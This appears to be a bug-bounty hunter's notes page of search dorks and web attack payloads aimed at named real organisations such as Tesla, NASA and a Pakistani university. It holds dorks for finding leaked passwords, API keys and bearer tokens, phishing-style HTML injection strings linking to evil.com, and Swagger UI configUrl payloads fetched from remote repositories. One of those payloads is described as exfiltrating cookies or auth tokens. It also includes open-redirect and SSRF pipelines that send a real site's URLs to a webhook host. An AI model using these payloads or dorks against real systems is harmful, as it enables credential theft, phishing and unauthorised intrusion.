Dorking

Find API Documations

site:.tesla.com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
site:.tesla.com intext:"api_key=" OR intext:"apiKey" OR intext:"client_secret" OR intext:"Authorization: Bearer"

Found Admin Panels & Leaked credentials Using GitHub Dork

"nasa" "password":
"@nasa" "password":

"nasa" "auth"
"nasa" "Bearer"

Email HTML Injection On Contact Forms

Lostsec Dorking - Google Dork Search Toollostsec.xyz
site:.domain.com inurl:"contact.php" | inurl:"contactus" | inurl:"contactus.php" | inurl:"contactus.aspx" | inurl:"contactus.asp" | inurl:"contactus.html" | inurl:"contact-us.html" | inurl:"contact_us.html" | inurl:"contact.html" | inurl:"contactus.html"
site:.*.com inurl:"contact us" intext:"Full Name" intext:"First Name" intext:Email intext:"Email Address"
'"/><img src=x><a href=https://evil.com>Click
<b>hello</b><h1>hacker</h1><a href=https://evil.com>hacked
<h1> Dear User, Your account will be Suspended. Click Below to Verify </h1> 
'"><<a href="http://evil.com">Click Me</a>

Email HTML Injection On Sign up Forms

site:.ue.edu.pk  inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup
<h1>Congratulations you won the cash prize </h1><img src="https://play-lh.googleusercontent.com/ufXzlOQA6bwOibqQ_yBmIFaqBWOl3bbgeffwPV8z3419PWPvHZfx4Vxe98GgQ8Z7mVQ"><a href="https://evil.com"><H1><U><I>Click here to claim your reward
hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123

Find XSS via uploadfile Name

site:.harmanaudio.com inurl:"uploadform" | intext:"choose file"
site:.harmanaudio.com inurl:"contact us" | intext:"Full Name" | intext:"First Name" | intext:Email intext:"Email Address"

Find Swagger DOM XSS

site:.worldremit.com intext:"Swagger UI" | intitle:"Swagger UI"
site:.nasa.gov inurl:"/swagger-ui/index.html"
intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:.un.org
nuclei -l livesubdomains.txt -t /home/kali/nucli/swagger/dom-xss/ -c 30

?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json

# 1. Loads a custom Swagger login form template for login phishing 
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rlogin.json

# 2. Tests open redirect behavior via a redirecting login config
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/ylogin.json

# 3. Triggers a basic XSS payload to check for DOM-based vulnerabilities
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json

# 4. Executes a script to exfiltrate cookies or auth tokens from localStorage
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

Chek Open Redirect

site:*.pk inurl:"redirectURL="
site:*.pk inurl:"=https"
echo https://partnerprogramm.otto.de | gau --threads 100 | tee urls.txt
cat urls.txt | grep "=" | qsreplace https://webhook.site/fa023611-2e9b-463e-8099-1cd7ad7df965 > ssrf.txt
cat ssrf.txt | httpx -fr
split -l 10 ssrf.txt output_file_prefix
cat livesubdomains.txt | nuclei -t /home/kali/nucli/swagger/open-redirect-generic.yaml

Find and Exploit Admin Panel 

site:.*.edu.pk "admin" inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure
site:.ue.edu.pk inurl:admin | inurl:dashboard | inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup

PreviousMy ConceptNextBugs Chains

Last updated